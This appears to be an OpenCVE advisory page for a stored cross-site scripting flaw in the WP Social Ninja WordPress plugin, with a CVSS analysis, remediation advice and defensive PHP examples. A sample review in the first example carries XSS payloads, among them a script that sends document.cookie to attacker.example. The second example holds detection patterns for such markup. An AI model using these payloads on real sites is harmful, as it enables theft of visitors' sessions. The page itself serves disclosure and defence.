Description
The WP Social Ninja – Embed Social Feeds, Customer Reviews, Chat Widgets plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 3.20.3 due to insufficient input sanitization and output escaping on externally-sourced content. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page, granted they can post malicious content to a connected Google Business Profile or Facebook page.
Published: 2025-12-02
Score: 6.1 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Stored Cross‑Site Scripting
Action: Apply Patch
AI Analysis

Impact

The WP Social Ninja plugin, a WordPress add-on that aggregates external content such as Google Reviews and YouTube feeds, contains a stored XSS flaw that lets an attacker with no WordPress account inject arbitrary JavaScript into pages that render imported content. The flaw exists because content retrieved from external services is insufficiently sanitized on import and insufficiently escaped on output. An attacker who can post to a Google Business Profile or Facebook page connected to the site can therefore embed HTML or JavaScript that executes in the browser of every visitor who loads the affected review page. The advisory does not name session hijacking or data exfiltration explicitly, but those are the usual consequences of client-side code execution in a visitor's session and are inferred here on that basis.
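To make the defect concrete, here is an added example in plain PHP, written for this page rather than taken from the plugin: a review record as an aggregator might store it after import, rendered first the way a vulnerable code path does and then with context-appropriate escaping. The field names and the sample review are constructed for the demo; in a WordPress plugin the escaping helpers would be esc_html(), esc_attr() and esc_url() rather than the stand-ins defined here.

```php
<?php
// Added example (not the plugin's code): rendering an imported review record
// the way a vulnerable aggregator does, beside a hardened rendering.
// The review array and its field names are assumptions made for the demo.

declare(strict_types=1);

// Minimal escaping helper. Inside WordPress you would call esc_html() or
// esc_attr() instead; this mirrors their behaviour closely enough to run
// from the command line.
function esc_text(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Only allow http(s) profile links. An attacker-controlled "profile URL" such
// as javascript:alert(1) must never reach an href (esc_url() in WordPress).
function esc_link(string $url): string {
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    if (!in_array($scheme, ['http', 'https'], true)) {
        return '';
    }
    return esc_text($url);
}

// Vulnerable: fields fetched from the external platform are trusted as if the
// site owner had written them and are interpolated into HTML verbatim.
function render_review_unsafe(array $r): string {
    return '<div class="review">'
         . '<a href="' . $r['author_url'] . '">' . $r['author_name'] . '</a>'
         . ' rated ' . $r['rating'] . '/5: '
         . '<p>' . $r['text'] . '</p>'
         . '</div>';
}

// Hardened: every externally sourced value is escaped for the context it is
// emitted into (text node, attribute, URL). The rating is coerced to an int.
function render_review_safe(array $r): string {
    $rating = max(0, min(5, (int) $r['rating']));
    $link   = esc_link($r['author_url']);
    $name   = esc_text($r['author_name']);
    $author = $link !== '' ? '<a href="' . $link . '">' . $name . '</a>' : $name;
    return '<div class="review">'
         . $author
         . ' rated ' . $rating . '/5: '
         . '<p>' . esc_text($r['text']) . '</p>'
         . '</div>';
}

// Constructed sample: what a malicious post on a connected business profile
// could look like once the plugin imports it. Not a real review.
$review = [
    'author_name' => 'Ann <img src=x onerror=alert(document.cookie)>',
    'author_url'  => 'javascript:alert(1)',
    'rating'      => '5',
    'text'        => 'Great place!<script>fetch("https://attacker.example/?c="+document.cookie)</script>',
];

echo "UNSAFE:\n" . render_review_unsafe($review) . "\n\n";
echo "SAFE:\n"   . render_review_safe($review)   . "\n";
```

Run it with `php render_review.php`. The unsafe output carries the `<script>` block, the `onerror` handler and the `javascript:` href through verbatim; the safe output renders them as inert text and drops the link. Escaping at output time is what the CVE description calls output escaping, and it has to be done per context (text node, attribute, URL), which is why a single strip-tags pass at import time is not a sufficient fix on its own.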

Affected Systems

WordPress sites running the WP Social Ninja plugin by adreastrian, versions up to and including 3.20.3. The flaw affects the code paths that render externally sourced review content.

Risk and Exploitability

The CVSS 3.1 base score of 6.1 (vector AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) rates the issue as medium severity: it is reachable over the network with no WordPress privileges, but a victim must load the injected page (UI:R), and the scope is changed because the payload runs in the visitor's browser rather than in the plugin's own security context. The EPSS score below 1% indicates a low current probability of exploitation, and the CVE is not in the CISA KEV catalog, so no exploitation in the wild is known. The practical prerequisite is the ability to post content to a Google Business Profile or Facebook page that the target site has connected; no account on the WordPress site is needed, which is why the CVE treats the attacker as unauthenticated. Once the plugin imports the malicious post, the script runs in the browser of every visitor who views the affected review page, giving the attacker client-side code execution in those visitors' sessions.

Generated by OpenCVE AI on April 22, 2026 at 20:59 UTC.

Remediation

No vendor advisory or workaround is linked on this page. The affected range stated in the description (all versions up to and including 3.20.3) implies that 3.20.4 is the first release outside it, which is the version the recommended actions below point to.

OpenCVE Recommended Actions

  • Upgrade WP Social Ninja to 3.20.4 or later, the first release outside the affected range; the fix lies in the sanitization and escaping of imported content.
  • If the update cannot be applied immediately, deactivate or uninstall the plugin to remove the attack surface until the patched version is installed.
  • Review the content already imported from connected Google Business Profile and Facebook sources. Legitimate review text contains no markup, so any record with HTML tags, event-handler attributes (onerror=, onload=, ...) or javascript: URLs should be removed or quarantined before it is rendered.
  • Deploy a Content Security Policy whose script-src does not include 'unsafe-inline', so injected inline script and on* handlers are blocked even if escaping fails; roll it out in report-only mode first, because WordPress themes and plugins commonly rely on inline scripts. Do not rely on the X-XSS-Protection header: the browser-side XSS filter it controlled has been removed from current browsers.
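As an added example (not code from the plugin or from OpenCVE), the following plain PHP shows the two recommendations above that can be automated: a pre-render scan that quarantines imported records containing markup, and the CSP header value that blocks inline script. The record layout, the sample batch and the wiring to the `send_headers` hook are assumptions made for the demo; `send_headers` is a real WordPress action, but the plugin's own import pipeline and storage are not shown here.

```php
<?php
// Added example (not the plugin's or OpenCVE's code): a pre-render check for
// imported reviews, plus a Content-Security-Policy that blocks inline script.
// Review records, field names and the sample batch are assumptions for the demo.

declare(strict_types=1);

// Flag imported text that contains markup or script-capable constructs.
// Legitimate Google/Facebook review text is plain text, so any tag, event
// handler attribute or javascript:/data: URI is a strong signal. The checks
// are deliberately coarse; a hit means "hold for a human", not "delete".
function find_suspicious_markup(string $s): array {
    $reasons = [];
    if (preg_match('/<\s*\/?\s*[a-z][^>]*>/i', $s)) {
        $reasons[] = 'html tag';
    }
    if (preg_match('/\bon[a-z]+\s*=/i', $s)) {
        $reasons[] = 'event handler attribute';
    }
    if (preg_match('/\b(javascript|data|vbscript)\s*:/i', $s)) {
        $reasons[] = 'script-capable uri';
    }
    if (preg_match('/&#x?[0-9a-f]+;|&[a-z]+;/i', $s)) {
        $reasons[] = 'html entity (possible encoding evasion)';
    }
    return $reasons;
}

// Walk a batch of imported reviews over the fields an attacker controls on the
// external platform and return, keyed by review id, the fields and reasons
// that warrant quarantine.
function quarantine_reviews(array $reviews): array {
    $flagged = [];
    foreach ($reviews as $r) {
        foreach (['author_name', 'text', 'author_url'] as $field) {
            $reasons = find_suspicious_markup((string) ($r[$field] ?? ''));
            if ($reasons !== []) {
                $flagged[$r['id']][$field] = $reasons;
            }
        }
    }
    return $flagged;
}

// A script-src without 'unsafe-inline' blocks inline <script> blocks and on*
// handlers even if an escaping bug lets them through. Many WordPress themes
// and plugins ship inline script, so deploy this as
// Content-Security-Policy-Report-Only first and add nonces or hashes for the
// legitimate inline scripts before switching to enforcement.
function csp_header_value(): string {
    return "default-src 'self'; script-src 'self'; object-src 'none'; "
         . "base-uri 'self'; frame-ancestors 'self'";
}

if (function_exists('add_action')) {
    // Inside WordPress: emit the header on every front-end response.
    add_action('send_headers', function (): void {
        header('Content-Security-Policy: ' . csp_header_value());
    });
}

// Constructed sample batch (not real reviews): one clean record, one with a
// tag plus handler and a javascript: link, one with an encoded tag.
$batch = [
    ['id' => 101, 'author_name' => 'Bob', 'author_url' => 'https://example.com/u/bob',
     'text' => 'Five stars, would return.'],
    ['id' => 102, 'author_name' => 'Eve <svg onload=alert(1)>', 'author_url' => 'javascript:alert(1)',
     'text' => 'nice'],
    ['id' => 103, 'author_name' => 'Mal', 'author_url' => 'https://example.com/u/mal',
     'text' => 'ok &lt;script&gt; test'],
];

print_r(quarantine_reviews($batch));
echo "CSP: " . csp_header_value() . "\n";
```

Record 101 passes, 102 is flagged on author_name and author_url, and 103 is flagged on text for the entity-encoded tag, which is worth catching because a later decode step could turn it back into live markup. On the CSP side, `script-src 'self'` is what neutralizes injected inline script; the report-only rollout, violation reports, and nonces or hashes for the theme's own inline scripts are the steps that make it deployable on a real WordPress site.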



Advisories

No advisories yet.

History

Wed, 03 Dec 2025 12:15:00 +0000

Type: First Time appeared
  Values Added: Wordpress (vendor); Wordpress wordpress (product)
Type: Vendors & Products
  Values Added: Wordpress (vendor); Wordpress wordpress (product)

Tue, 02 Dec 2025 15:15:00 +0000

Type: Metrics
  Values Added: ssvc
  {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Tue, 02 Dec 2025 07:00:00 +0000

Type: Description
  Values Added: The WP Social Ninja – Embed Social Feeds, Customer Reviews, Chat Widgets plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 3.20.3 due to insufficient input sanitization and output escaping on externally-sourced content. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page, granted they can post malicious content to a connected Google Business Profile or Facebook page.
Type: Title
  Values Added: WP Social Ninja – Embed Social Feeds, Customer Reviews, Chat Widgets (Google Reviews, YouTube Feed, Photo Feeds, and More) <= 3.20.3 - Unauthenticated Stored Cross-Site Scripting via External Content Import
Type: Weaknesses
  Values Added: CWE-79
Type: References
  Values Added: (empty)
Type: Metrics
  Values Added: cvssV3_1
  {'score': 6.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}


MITRE

Status: PUBLISHED

Assigner: Wordfence

Published:

Updated: 2026-04-08T16:37:14.689Z

Reserved: 2025-11-11T14:37:22.474Z

Link: CVE-2025-13007

Vulnrichment

Updated: 2025-12-02T14:16:29.348Z

NVD

Status : Deferred

Published: 2025-12-02T07:15:48.217

Modified: 2026-04-15T00:35:42.020

Link: CVE-2025-13007

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-22T21:00:06Z

Weaknesses